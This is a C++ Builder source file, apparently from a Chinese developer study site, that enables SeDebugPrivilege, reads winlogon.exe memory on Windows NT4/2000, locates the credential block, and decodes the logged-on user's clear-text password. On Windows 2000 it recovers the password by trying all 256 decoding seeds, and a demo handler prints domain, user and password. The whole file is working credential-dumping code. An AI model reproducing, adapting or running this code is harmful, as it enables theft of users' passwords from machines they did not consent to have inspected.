// Recover the currently logged-on user's domain, user name and clear-text password on
// 32-bit Windows NT4 / 2000 by reading the memory of winlogon.exe. Needs administrative
// rights (SeDebugPrivilege is enabled by the code). Entry point:
//   bool GetPassword(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
/ / -------------------------------------------------------------------------------------------- ---------------------------
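// Mirror of the native UNICODE_STRING handed to RtlRunDecodeUnicodeString:
// a counted string, Length/MaximumLength in BYTES, not necessarily NUL-terminated.
// (The listing's identifier casing was corrupted; restored here.)
typedef struct _UNICODE_STRING
{
    USHORT Length;          // bytes in use, excluding any terminator
    USHORT MaximumLength;   // bytes allocated at Buffer
    PWSTR  Buffer;
} UNICODE_STRING, *PUNICODE_STRING;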
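// One 16-byte entry of the buffer returned by NtQuerySystemInformation(0x10).
// The layout and field names are the original author's empirical reading of
// that undocumented handle table on NT4/2000; only HandleType and PID are
// consumed (see FindWinlogon).  Treat the other fields as unverified.
typedef struct _QUERY_SYSTEM_INFORMATION
{
    DWORD GrantedAccess;
    DWORD PID;
    WORD  HandleType;   // 5 == process object on the builds this was written for
    WORD  HandleId;
    DWORD Handle;
} QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION;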
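// Header of the module list inside the RtlQueryProcessDebugInformation buffer
// (found 0x60 bytes into the buffer by FindWinlogon).  Only Count is used;
// the two unknown DWORDs are kept to preserve the stride to the first entry.
typedef struct _PROCESS_INFO_HEADER
{
    DWORD Count;    // number of PROCESS_INFO entries that follow
    DWORD Unk04;
    DWORD Unk08;
} PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER;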
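// One loaded-module record of the RtlQueryProcessDebugInformation module list.
// Only Name is used (to recognise WINLOGON / MSGINA / NWGINA); the stride of
// sizeof(PROCESS_INFO) is what matters, so the unknown fields must stay.
// Layout is the original author's empirical reading on NT4/2000.
typedef struct _PROCESS_INFO
{
    DWORD LoadAddress;
    DWORD Size;
    DWORD Unk08;
    DWORD Enumerator;
    DWORD Unk10;
    CHAR  Name[0x108];   // ANSI module path/name, NUL-terminated
} PROCESS_INFO, *PPROCESS_INFO;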
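// Credential record found 0x400 bytes past the user name in winlogon's heap
// on NT4 (see LocatePasswordPageWinNT).  The listing only reads two fields:
//   LoggedOn              logon time (FILETIME)
//   EncodedPassword.Length  low byte = encoded byte length,
//                           high byte = RtlRunEncodeUnicodeString seed
// The encoded characters follow this struct inline (offset 0x34); the
// Buffer pointer is not dereferenced.  HashByte is named after the original
// author's guess and is NOT what the code uses for the seed.
typedef struct _ENCODED_PASSWORD_INFO
{
    DWORD          HashByte;
    DWORD          Unk04;
    DWORD          Unk08;
    DWORD          Unk0C;
    FILETIME       LoggedOn;
    DWORD          Unk18;
    DWORD          Unk1C;
    DWORD          Unk20;
    DWORD          Unk24;
    DWORD          Unk28;
    UNICODE_STRING EncodedPassword;   // ends at 0x34; encoded chars follow
} ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO;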
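// Signatures of the undocumented ntdll exports resolved at run time by
// GetPassword().  NtQuerySystemInformation / RtlQueryProcessDebugInformation
// return an NTSTATUS (0 == success), carried here as a DWORD.
// (The listing had lost the parentheses around the declarators; restored.)
typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION)(DWORD, PVOID, DWORD, PDWORD);
typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER)(DWORD, DWORD);
typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION)(DWORD, DWORD, PVOID);
typedef void  (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER)(PVOID);
typedef void  (__stdcall *PFNRTLRUNDECODEUNICODESTRING)(BYTE, PUNICODE_STRING);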
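// private prototypes
// ReturnWinNTPwd/ReturnWin2kPwd take three strings (domain, user, password),
// matching every call site; the listing showed a two-parameter definition for
// them, which cannot compile against these calls.
bool  IsWinNT(void);
bool  IsWin2k(void);
bool  AddDebugPrivilege(void);
DWORD FindWinlogon(void);
bool  LocatePasswordPageWinNT(DWORD dwWinlogonPID, PDWORD pdwPwdLen);
bool  LocatePasswordPageWin2k(DWORD dwWinlogonPID, PDWORD pdwPwdLen);
void  ReturnWinNTPwd(String &strCurrDomain, String &strCurrUser, String &strCurrPwd);
void  ReturnWin2kPwd(String &strCurrDomain, String &strCurrUser, String &strCurrPwd);
bool  GetPassword(String &strCurrDomain, String &strCurrUser, String &strCurrPwd);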
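// Global Variables
// ntdll entry points, resolved in GetPassword(); NULL until then.
// (The listing declared the last one with a non-existent type name.)
PFNNTQUERYSYSTEMINFORMATION        pfnNtQuerySystemInformation        = NULL;
PFNRTLCREATEQUERYDEBUGBUFFER       pfnRtlCreateQueryDebugBuffer       = NULL;
PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation = NULL;
PFNRTLDESTROYQUERYDEBUGBUFFER      pfnRtlDestroyQueryDebugBuffer      = NULL;
PFNRTLRUNDECODEUNICODESTRING       pfnRtlRunDecodeUnicodeString       = NULL;
// State handed from the LocatePasswordPage* scanners to the Return*Pwd decoders.
DWORD dwPwdLen   = 0;      // encoded password length in characters
PVOID pvRealPwd  = NULL;   // address of the encoded password inside winlogon (informational)
PVOID pvPwd      = NULL;   // the same bytes in this process's copy of that region
DWORD dwHashByte = 0;      // RtlRunEncodeUnicodeString seed (NT4 path only)
// Markers the scanners search for: the logged-on user's name and domain.
wchar_t wszUsername[0x400];
wchar_t wszUserDomain[0x400];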
/ / -------------------------------------------------------------------------------------------- ---------------------------
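//---------------------------------------------------------------------------
// Entry point.  Recovers the logged-on user's domain, user name and clear-text
// password from winlogon.exe's memory on 32-bit Windows NT4 / 2000.
//
// Requirements: administrative rights (SeDebugPrivilege is enabled here), the
// standard Microsoft GINA (msgina.dll) in winlogon, and one of the two legacy
// memory layouts the Locate* helpers were derived from.  The password is a
// secret: the caller owns the returned String and should clear it when done.
//
// strCurrDomain / strCurrUser / strCurrPwd  receive the result on success.
// Returns true when the credential block was located (strCurrPwd is empty
// when the account has no password); false on any failure.
//
// Fixes relative to the listing: LoadLibrary and every GetProcAddress result
// are checked (the scan used to call through NULL when an export was missing),
// empty USERNAME/USERDOMAIN markers are rejected (they would match anywhere),
// ntdll is released on the success path too, and our copy of the encoded
// password is wiped after decoding.
bool GetPassword(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
{
    // Only the NT family has the layouts we know.  IsWin2k() matches any 5.x
    // kernel (2000, XP, 2003); the "Win2k" offsets were verified on 2000 only.
    if (!IsWinNT() && !IsWin2k())
        return false;

    // Reading winlogon's address space needs SeDebugPrivilege.
    if (!AddDebugPrivilege())
        return false;

    HINSTANCE hNtdll = LoadLibrary("NTDLL.DLL");
    if (!hNtdll)
        return false;

    // GetProcAddress is case-sensitive: these are the exact export names.
    pfnNtQuerySystemInformation = (PFNNTQUERYSYSTEMINFORMATION)
        GetProcAddress(hNtdll, "NtQuerySystemInformation");
    pfnRtlCreateQueryDebugBuffer = (PFNRTLCREATEQUERYDEBUGBUFFER)
        GetProcAddress(hNtdll, "RtlCreateQueryDebugBuffer");
    pfnRtlQueryProcessDebugInformation = (PFNRTLQUERYPROCESSDEBUGINFORMATION)
        GetProcAddress(hNtdll, "RtlQueryProcessDebugInformation");
    pfnRtlDestroyQueryDebugBuffer = (PFNRTLDESTROYQUERYDEBUGBUFFER)
        GetProcAddress(hNtdll, "RtlDestroyQueryDebugBuffer");
    pfnRtlRunDecodeUnicodeString = (PFNRTLRUNDECODEUNICODESTRING)
        GetProcAddress(hNtdll, "RtlRunDecodeUnicodeString");
    if (!pfnNtQuerySystemInformation || !pfnRtlCreateQueryDebugBuffer ||
        !pfnRtlQueryProcessDebugInformation || !pfnRtlDestroyQueryDebugBuffer ||
        !pfnRtlRunDecodeUnicodeString)
    {
        FreeLibrary(hNtdll);
        return false;
    }

    // Locate winlogon's PID - needs the debug privilege and admin rights.
    DWORD dwWinlogonPID = FindWinlogon();
    if (!dwWinlogonPID)
    {
        // winlogon not found, or it uses nwgina.dll (Novell), whose credential
        // block this code cannot locate.
        FreeLibrary(hNtdll);
        return false;
    }

    // The scanners recognise the credential block by these two strings.
    memset(wszUsername, 0, sizeof(wszUsername));
    memset(wszUserDomain, 0, sizeof(wszUserDomain));
    GetEnvironmentVariableW(L"UserName", wszUsername,
                            sizeof(wszUsername) / sizeof(wszUsername[0]));
    GetEnvironmentVariableW(L"UserDomain", wszUserDomain,
                            sizeof(wszUserDomain) / sizeof(wszUserDomain[0]));
    if (wszUsername[0] == L'\0' || wszUserDomain[0] == L'\0')
    {
        FreeLibrary(hNtdll);
        return false;
    }

    // Find the block of winlogon memory holding the encoded password.
    bool bFoundPasswordPage = IsWin2k()
        ? LocatePasswordPageWin2k(dwWinlogonPID, &dwPwdLen)
        : LocatePasswordPageWinNT(dwWinlogonPID, &dwPwdLen);
    if (!bFoundPasswordPage)
    {
        FreeLibrary(hNtdll);
        return false;
    }

    if (dwPwdLen == 0)
    {
        // Credential block present but the account has no password.
        strCurrDomain = String(wszUserDomain);
        strCurrUser   = String(wszUsername);
        strCurrPwd    = "";
    }
    else if (IsWin2k())
        ReturnWin2kPwd(strCurrDomain, strCurrUser, strCurrPwd);
    else
        ReturnWinNTPwd(strCurrDomain, strCurrUser, strCurrPwd);

    // Wipe our copy of the encoded password.  The heap block it lives in is
    // kept alive by the Locate* helpers (pvPwd is an interior pointer with no
    // base recorded), so clearing the bytes is the best we can do here.
    if (pvPwd && dwPwdLen)
    {
        volatile BYTE *pb = (volatile BYTE *)pvPwd;
        for (DWORD n = 0; n < dwPwdLen * sizeof(wchar_t); n++)
            pb[n] = 0;
    }

    FreeLibrary(hNtdll);
    return true;
}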
/ / -------------------------------------------------------------------------------------------- ---------------------------
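//---------------------------------------------------------------------------
// True when running on any NT-family kernel (NT4, 2000, XP, ...), i.e. when
// GetVersionEx reports VER_PLATFORM_WIN32_NT.  False on Win9x or if
// GetVersionEx fails.  Used to select the NT4 memory layout when IsWin2k()
// is false.
bool IsWinNT(void)
{
    OSVERSIONINFO osVersionInfo;
    memset(&osVersionInfo, 0, sizeof(osVersionInfo));
    osVersionInfo.dwOSVersionInfoSize = sizeof(osVersionInfo);
    if (!GetVersionEx(&osVersionInfo))
        return false;
    return osVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT;
}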
/ / -------------------------------------------------------------------------------------------- ---------------------------
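//---------------------------------------------------------------------------
// True for an NT-family kernel with major version 5.  Despite the name this
// matches 2000, XP and 2003 alike; the callers use it to pick the "Win2k"
// memory layout, which the original author only verified on 2000.
// False if GetVersionEx fails.
bool IsWin2k(void)
{
    OSVERSIONINFO osVersionInfo;
    memset(&osVersionInfo, 0, sizeof(osVersionInfo));
    osVersionInfo.dwOSVersionInfoSize = sizeof(osVersionInfo);
    if (!GetVersionEx(&osVersionInfo))
        return false;
    return osVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT &&
           osVersionInfo.dwMajorVersion == 5;
}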
/ / -------------------------------------------------------------------------------------------- ---------------------------
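//---------------------------------------------------------------------------
// Enables SeDebugPrivilege in the current process token so that
// OpenProcess/ReadProcessMemory can reach winlogon.  The privilege must
// already be present in the token (administrator); this only switches it on.
//
// Returns true only when the privilege was actually enabled.
// AdjustTokenPrivileges returns TRUE even when it assigned nothing and
// signals that via GetLastError() == ERROR_NOT_ALL_ASSIGNED; the listing
// ignored that and also never closed the token handle.
bool AddDebugPrivilege(void)
{
    HANDLE hToken = NULL;
    if (!OpenProcessToken(GetCurrentProcess(),
                          TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken))
        return false;

    bool bRC = false;
    TOKEN_PRIVILEGES tokenPrivileges;
    memset(&tokenPrivileges, 0, sizeof(tokenPrivileges));
    if (LookupPrivilegeValue(NULL, "SeDebugPrivilege",
                             &tokenPrivileges.Privileges[0].Luid))
    {
        tokenPrivileges.PrivilegeCount = 1;
        tokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

        TOKEN_PRIVILEGES previousState;   // one entry, enough for one privilege
        DWORD dwReturnLength = 0;
        if (AdjustTokenPrivileges(hToken, FALSE, &tokenPrivileges,
                                  sizeof(tokenPrivileges), &previousState,
                                  &dwReturnLength))
            bRC = (GetLastError() != ERROR_NOT_ALL_ASSIGNED);
    }

    CloseHandle(hToken);
    return bRC;
}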
/ / -------------------------------------------------------------------------------------------- ---------------------------
// This code was contributed by a friend of CCRUN ("old demon"). Questions or suggestions: info@ccrun.com
// C++ Builder study group: http://www.ccrun.com
/ / -------------------------------------------------------------------------------------------- ---------------------------
// Note That The Following Code Eliminates the NEED
// for psapi.dll as part of the executable.
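DWORD FindWinlogon(void)
{
    // Returns the PID of winlogon.exe, or 0.
    //
    // The process list comes from NtQuerySystemInformation class 0x10 (the
    // handle table) instead of psapi.dll.  Every entry of object type 5
    // (process object on the targeted builds) is resolved with
    // RtlQueryProcessDebugInformation(pid, 1 /*modules*/) and its module list
    // is inspected:  module 0 named WINLOGON -> candidate; a module named
    // MSGINA -> Microsoft GINA, return the PID; a module named NWGINA ->
    // Novell GINA, whose credential block this tool cannot find -> 0.
    // The 0x60 offset and the PROCESS_INFO layout are the original author's
    // empirical reading of the debug buffer on NT4/2000 - verify elsewhere.
    // Requires SeDebugPrivilege (AddDebugPrivilege) and the ntdll pointers
    // resolved by GetPassword().
    //
    // Fixes relative to the listing: NULL function pointers / allocations are
    // rejected instead of dereferenced; the NWGINA early-return no longer leaks
    // the debug buffer and the handle table; the module walk stepped dwCount
    // times starting at module 1 and so read one entry past the end - it now
    // stops at dwCount - 1; Pos() needles are upper case, as the haystack is.
#define INITIAL_ALLOCATION 0x100
    if (!pfnNtQuerySystemInformation || !pfnRtlCreateQueryDebugBuffer ||
        !pfnRtlQueryProcessDebugInformation || !pfnRtlDestroyQueryDebugBuffer)
        return 0;

    HANDLE hHeap = GetProcessHeap();
    DWORD dwRC = 0;
    DWORD dwSizeNeeded = 0;

    // First call only tells us how large the handle table is.
    PVOID pvInfo = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, INITIAL_ALLOCATION);
    if (!pvInfo)
        return 0;
    pfnNtQuerySystemInformation(0x10, pvInfo, INITIAL_ALLOCATION, &dwSizeNeeded);
    HeapFree(hHeap, 0, pvInfo);
    if (dwSizeNeeded == 0)
        return 0;

    // Second call with the proper size.  If the table grew in between, this
    // call fails and we report "not found" (the original did the same).
    pvInfo = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, dwSizeNeeded);
    if (!pvInfo)
        return 0;
    DWORD dwSizeWritten = dwSizeNeeded;
    if (pfnNtQuerySystemInformation(0x10, pvInfo, dwSizeNeeded, &dwSizeWritten) != 0)
    {
        HeapFree(hHeap, 0, pvInfo);
        return 0;
    }

    // The walk starts at the head of the buffer in 16-byte steps, exactly as
    // the original did; the entry layout is undocumented (see the struct).
    DWORD dwNumHandles = dwSizeWritten / sizeof(QUERY_SYSTEM_INFORMATION);
    PQUERY_SYSTEM_INFORMATION pEntry = (PQUERY_SYSTEM_INFORMATION)pvInfo;
    bool bDone = false;

    try
    {
        for (DWORD i = 0; i < dwNumHandles && !bDone; i++, pEntry++)
        {
            // "5" is the object type of a process on these builds.
            if (pEntry->HandleType != 5)
                continue;

            PVOID pvDebugBuffer = pfnRtlCreateQueryDebugBuffer(0, 0);
            if (!pvDebugBuffer)
                continue;

            // Flag 1 == ask for the module list of that process.
            if (pfnRtlQueryProcessDebugInformation(pEntry->PID, 1, pvDebugBuffer) == 0)
            {
                PPROCESS_INFO_HEADER pHeader =
                    (PPROCESS_INFO_HEADER)((DWORD)pvDebugBuffer + 0x60);
                DWORD dwCount = pHeader->Count;
                PPROCESS_INFO pModule =
                    (PPROCESS_INFO)((DWORD)pHeader + sizeof(PROCESS_INFO_HEADER));

                // Module 0 is the executable itself.
                if (dwCount > 0 &&
                    AnsiString(pModule->Name).UpperCase().Pos("WINLOGON") != 0)
                {
                    bDone = true;
                    for (DWORD j = 1; j < dwCount; j++)
                    {
                        AnsiString strName = AnsiString(pModule[j].Name).UpperCase();
                        if (strName.Pos("NWGINA") != 0)
                        {
                            dwRC = 0;   // Novell GINA: unsupported layout
                            break;
                        }
                        if (strName.Pos("MSGINA") != 0)
                            dwRC = pEntry->PID;
                    }
                }
            }
            pfnRtlDestroyQueryDebugBuffer(pvDebugBuffer);
        }
    }
    catch (...)
    {
        // A bad entry or an unreadable debug buffer raises an access
        // violation; report whatever was found so far rather than crash.
        // (The debug buffer of the faulting iteration is not released.)
    }

    HeapFree(hHeap, 0, pvInfo);
    return dwRC;
}
//---------------------------------------------------------------------------
bool LocatePasswordPageWinNT(DWORD dwWinlogonPID, PDWORD pdwPwdLen)
{
    // NT4 variant.  Reads winlogon's default process heap and scans it for
    // the credential block, recognised by the logged-on user name with the
    // user domain 0x200 bytes later.  0x400 bytes after the user name sits an
    // ENCODED_PASSWORD_INFO whose EncodedPassword.Length packs the encoded
    // byte length (low byte) and the RtlRunEncodeUnicodeString seed (high
    // byte); the encoded characters follow that struct inline (+0x34).
    //
    // On success: *pdwPwdLen = password length in characters, dwHashByte =
    // seed, pvPwd -> encoded bytes in OUR copy of the heap region, pvRealPwd
    // = their address inside winlogon.  The copy is deliberately kept alive:
    // pvPwd points into it and ReturnWinNTPwd reads it later.
    //
    // 32-bit only: addresses travel in DWORDs and the PEB is assumed at the
    // fixed pre-ASLR address 0x7ffdf000.  Requires SeDebugPrivilege.
    //
    // Fixes relative to the listing: the PEB page buffer is freed on the
    // error path, allocations are checked, the scan stops early enough that
    // the domain compare and the struct read stay inside the copy (it used to
    // run to the very end of the region), and the copy is released when
    // nothing was found.  The unused logon-time conversion was dropped.
#define USER_DOMAIN_OFFSET_WINNT   0x200
#define USER_PASSWORD_OFFSET_WINNT 0x400
#define PWD_BYTES_OFFSET_WINNT     0x34    // encoded chars follow the struct
#define PWD_TAIL_MARGIN_WINNT      (USER_PASSWORD_OFFSET_WINNT + PWD_BYTES_OFFSET_WINNT + 0x100)
    *pdwPwdLen = 0;
    HANDLE hWinlogon = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
                                   FALSE, dwWinlogonPID);
    if (!hWinlogon)
        return false;

    HANDLE hHeap = GetProcessHeap();
    bool bRC = false;
    SYSTEM_INFO siSystemInfo;
    GetSystemInfo(&siSystemInfo);

    // Page holding winlogon's PEB.  The original comment called it the TEB;
    // the variable name and the value read from it (the process heap) say
    // PEB - confirm against the target build if this ever fails.
    DWORD dwPEB = 0x7ffdf000;
    DWORD dwBytesCopied = 0;
    PVOID pvPEB = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, siSystemInfo.dwPageSize);
    if (!pvPEB)
    {
        CloseHandle(hWinlogon);
        return false;
    }
    if (!ReadProcessMemory(hWinlogon, (PVOID)dwPEB, pvPEB,
                           siSystemInfo.dwPageSize, &dwBytesCopied) ||
        dwBytesCopied < 7 * sizeof(DWORD))
    {
        HeapFree(hHeap, 0, pvPEB);
        CloseHandle(hWinlogon);
        return false;
    }

    // Seventh DWORD of that page (offset 0x18): winlogon's process heap.
    DWORD dwWinlogonHeap = *(PDWORD)((DWORD)pvPEB + 6 * sizeof(DWORD));
    MEMORY_BASIC_INFORMATION mbi;
    if (VirtualQueryEx(hWinlogon, (PVOID)dwWinlogonHeap, &mbi, sizeof(mbi)) &&
        (mbi.State & MEM_COMMIT) == MEM_COMMIT &&
        (mbi.Protect & PAGE_GUARD) == 0 &&
        mbi.RegionSize > PWD_TAIL_MARGIN_WINNT)
    {
        PVOID pvWinlogonMem = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, mbi.RegionSize);
        if (pvWinlogonMem &&
            ReadProcessMemory(hWinlogon, (PVOID)dwWinlogonHeap, pvWinlogonMem,
                              mbi.RegionSize, &dwBytesCopied))
        {
            DWORD dwStart = (DWORD)pvWinlogonMem;
            // Leave room for the domain string, the struct and up to 0xff
            // password bytes so every access below stays inside the copy.
            DWORD dwEnd = dwStart + mbi.RegionSize - PWD_TAIL_MARGIN_WINNT;
            DWORD dwUsernamePos = 0;

            // The order in memory is wszUsername followed by wszUserDomain.
            for (DWORD i = dwStart; i < dwEnd; i += 2)
            {
                if (wcscmp(wszUsername, (wchar_t *)i) == 0 &&
                    wcscmp(wszUserDomain,
                           (wchar_t *)(i + USER_DOMAIN_OFFSET_WINNT)) == 0)
                {
                    dwUsernamePos = i;
                    break;
                }
            }

            if (dwUsernamePos)
            {
                PENCODED_PASSWORD_INFO pInfo =
                    (PENCODED_PASSWORD_INFO)(dwUsernamePos + USER_PASSWORD_OFFSET_WINNT);
                // Length field packs: low byte = byte length, high byte = seed.
                *pdwPwdLen = (pInfo->EncodedPassword.Length & 0x00ff) / sizeof(wchar_t);
                dwHashByte = (pInfo->EncodedPassword.Length & 0xff00) >> 8;

                DWORD dwOffset = (dwUsernamePos - dwStart) +
                                 USER_PASSWORD_OFFSET_WINNT + PWD_BYTES_OFFSET_WINNT;
                pvRealPwd = (PVOID)(dwWinlogonHeap + dwOffset);
                pvPwd     = (PVOID)(dwStart + dwOffset);
                bRC = true;
            }
        }
        if (!bRC && pvWinlogonMem)
            HeapFree(hHeap, 0, pvWinlogonMem);   // kept only when pvPwd points into it
    }

    HeapFree(hHeap, 0, pvPEB);
    CloseHandle(hWinlogon);
    return bRC;
}
//---------------------------------------------------------------------------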
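//---------------------------------------------------------------------------
bool LocatePasswordPageWin2k(DWORD dwWinlogonPID, PDWORD pdwPwdLen)
{
    // Windows 2000 variant.  Walks every committed, non-guard region of
    // winlogon's address space and tests whether the region STARTS with the
    // logged-on user name and has the user domain 0x400 bytes in; the
    // original only tested region starts, evidently because the credential
    // block is region-aligned on 2000.  The encoded password begins 0x800
    // bytes into the region.  No seed is stored here; ReturnWin2kPwd brute
    // forces it.
    //
    // On success: *pdwPwdLen = encoded length in characters, pvPwd -> the
    // bytes in OUR copy of the region (kept alive for ReturnWin2kPwd),
    // pvRealPwd = their address inside winlogon.
    //
    // 32-bit only (addresses in DWORDs).  Requires SeDebugPrivilege.
    //
    // Fixes relative to the listing: allocations are checked; regions too
    // small to hold the 0x800 password offset are skipped (the domain/password
    // reads used to run past the copy); the length count never runs past the
    // copied region and uses the whole 16-bit unit as terminator (the original
    // checked both bytes of the first unit but only the low byte afterwards);
    // the copy is released when the region does not match.
#define USER_DOMAIN_OFFSET_WIN2K   0x400
#define USER_PASSWORD_OFFSET_WIN2K 0x800
    *pdwPwdLen = 0;
    HANDLE hWinlogon = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
                                   FALSE, dwWinlogonPID);
    if (!hWinlogon)
        return false;

    HANDLE hHeap = GetProcessHeap();
    SYSTEM_INFO siSystemInfo;
    GetSystemInfo(&siSystemInfo);
    DWORD dwAddr    = (DWORD)siSystemInfo.lpMinimumApplicationAddress;
    DWORD dwMaxAddr = (DWORD)siSystemInfo.lpMaximumApplicationAddress;
    bool bRC = false;

    while (dwAddr < dwMaxAddr && !bRC)
    {
        MEMORY_BASIC_INFORMATION mbi;
        DWORD dwIncrement = siSystemInfo.dwPageSize;   // step when the query fails
        if (VirtualQueryEx(hWinlogon, (PVOID)dwAddr, &mbi, sizeof(mbi)))
        {
            dwIncrement = mbi.RegionSize;
            if ((mbi.State & MEM_COMMIT) == MEM_COMMIT &&
                (mbi.Protect & PAGE_GUARD) == 0 &&
                mbi.RegionSize > USER_PASSWORD_OFFSET_WIN2K + sizeof(wchar_t))
            {
                PVOID pvCopy = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, mbi.RegionSize);
                DWORD dwBytesCopied = 0;
                if (pvCopy &&
                    ReadProcessMemory(hWinlogon, (PVOID)dwAddr, pvCopy,
                                      mbi.RegionSize, &dwBytesCopied))
                {
                    const wchar_t *pwszUser = (const wchar_t *)pvCopy;
                    const wchar_t *pwszDomain =
                        (const wchar_t *)((DWORD)pvCopy + USER_DOMAIN_OFFSET_WIN2K);
                    if (wcscmp(pwszUser, wszUsername) == 0 &&
                        wcscmp(pwszDomain, wszUserDomain) == 0)
                    {
                        const wchar_t *pwszPwd =
                            (const wchar_t *)((DWORD)pvCopy + USER_PASSWORD_OFFSET_WIN2K);
                        const wchar_t *pwszEnd =
                            (const wchar_t *)((DWORD)pvCopy + mbi.RegionSize);
                        // Count encoded units up to a 16-bit NUL.  Best effort:
                        // the encoding is not guaranteed to avoid zero units.
                        DWORD dwLen = 0;
                        while (pwszPwd + dwLen < pwszEnd && pwszPwd[dwLen] != 0)
                            dwLen++;

                        pvRealPwd  = (PVOID)(dwAddr + USER_PASSWORD_OFFSET_WIN2K);
                        pvPwd      = (PVOID)pwszPwd;
                        *pdwPwdLen = dwLen;
                        bRC = true;   // keep pvCopy alive: pvPwd points into it
                    }
                }
                if (!bRC && pvCopy)
                    HeapFree(hHeap, 0, pvCopy);
            }
        }
        // Move to the next memory block.
        dwAddr += dwIncrement;
    }

    CloseHandle(hWinlogon);
    return bRC;
}
//---------------------------------------------------------------------------
void ReturnWinNTPwd(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
{
    // NT4: decode the password located by LocatePasswordPageWinNT.  The seed
    // (dwHashByte) came out of the credential block, so one
    // RtlRunDecodeUnicodeString call suffices.  Fills the three out-strings
    // from the globals.  Does nothing if the scanner state is missing.
    // The decode buffer held the clear-text password and is wiped before it
    // is released (the listing freed it as-is and did not check HeapAlloc).
    if (!pvPwd || !pfnRtlRunDecodeUnicodeString)
        return;

    HANDLE hHeap = GetProcessHeap();
    UNICODE_STRING usEncoded;
    usEncoded.Length        = (USHORT)(dwPwdLen * sizeof(wchar_t));
    usEncoded.MaximumLength = (USHORT)(usEncoded.Length + sizeof(wchar_t)); // + terminator
    usEncoded.Buffer        = (PWSTR)HeapAlloc(hHeap, HEAP_ZERO_MEMORY,
                                               usEncoded.MaximumLength);
    if (!usEncoded.Buffer)
        return;

    CopyMemory(usEncoded.Buffer, pvPwd, usEncoded.Length);
    // Only one call is required since the seed was part of the stored record.
    pfnRtlRunDecodeUnicodeString((BYTE)dwHashByte, &usEncoded);

    strCurrDomain = String(wszUserDomain);
    strCurrUser   = String(wszUsername);
    strCurrPwd    = String(usEncoded.Buffer);   // NUL-terminated: HEAP_ZERO_MEMORY

    // Scrub the clear text before giving the block back to the heap.
    volatile BYTE *pb = (volatile BYTE *)usEncoded.Buffer;
    for (DWORD n = 0; n < usEncoded.MaximumLength; n++)
        pb[n] = 0;
    HeapFree(hHeap, 0, usEncoded.Buffer);
}
//---------------------------------------------------------------------------
void ReturnWin2kPwd(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
{
    // Windows 2000: the seed is not stored with the password, so all 256
    // seeds are tried and a candidate is accepted when every decoded unit is
    // printable ASCII (0x20..0x7e with a zero high byte).  As in the original,
    // every accepted candidate overwrites the previous one, so the highest
    // seed that passes wins; short passwords can pass for more than one seed.
    // Fills the three out-strings from the globals; leaves them untouched if
    // no candidate is printable or the scanner state is missing.
    // The decode buffer is wiped before release (it held clear-text
    // candidates); the listing did not check HeapAlloc.
    if (!pvPwd || !pfnRtlRunDecodeUnicodeString)
        return;

    HANDLE hHeap = GetProcessHeap();
    UNICODE_STRING usEncoded;
    usEncoded.Length        = (USHORT)(dwPwdLen * sizeof(wchar_t));
    usEncoded.MaximumLength = (USHORT)(usEncoded.Length + sizeof(wchar_t)); // + terminator
    usEncoded.Buffer        = (PWSTR)HeapAlloc(hHeap, HEAP_ZERO_MEMORY,
                                               usEncoded.MaximumLength);
    if (!usEncoded.Buffer)
        return;

    for (DWORD dwSeed = 0; dwSeed <= 0xff; dwSeed++)
    {
        // Decoding is in place, so start from a fresh copy every time.
        CopyMemory(usEncoded.Buffer, pvPwd, usEncoded.Length);
        pfnRtlRunDecodeUnicodeString((BYTE)dwSeed, &usEncoded);

        // Check for a viewable (printable ASCII) password.
        bool bViewable = true;
        for (DWORD j = 0; j < dwPwdLen && bViewable; j++)
        {
            wchar_t wc = usEncoded.Buffer[j];
            if (wc < 0x20 || wc > 0x7e)
                bViewable = false;
        }

        if (bViewable)
        {
            strCurrDomain = String(wszUserDomain);
            strCurrUser   = String(wszUsername);
            strCurrPwd    = String(usEncoded.Buffer);   // NUL-terminated: HEAP_ZERO_MEMORY
        }
    }

    // Scrub the last decoded candidate before giving the block back.
    volatile BYTE *pb = (volatile BYTE *)usEncoded.Buffer;
    for (DWORD n = 0; n < usEncoded.MaximumLength; n++)
        pb[n] = 0;
    HeapFree(hHeap, 0, usEncoded.Buffer);
}
//---------------------------------------------------------------------------
// call example
void __fastcall TForm1::Button1Click(TObject *Sender)
{
    // Demo: dump domain / user / password into the memo.  The listing ignored
    // GetPassword's return value and printed three empty lines on failure.
    String strCurrDomain, strCurrUser, strCurrPwd;
    if (!GetPassword(strCurrDomain, strCurrUser, strCurrPwd))
    {
        Memo1->Lines->Add("GetPassword failed (needs admin rights, NT4/2000 and msgina.dll)");
        return;
    }
    Memo1->Lines->Add(strCurrDomain);
    Memo1->Lines->Add(strCurrUser);
    Memo1->Lines->Add(strCurrPwd);
}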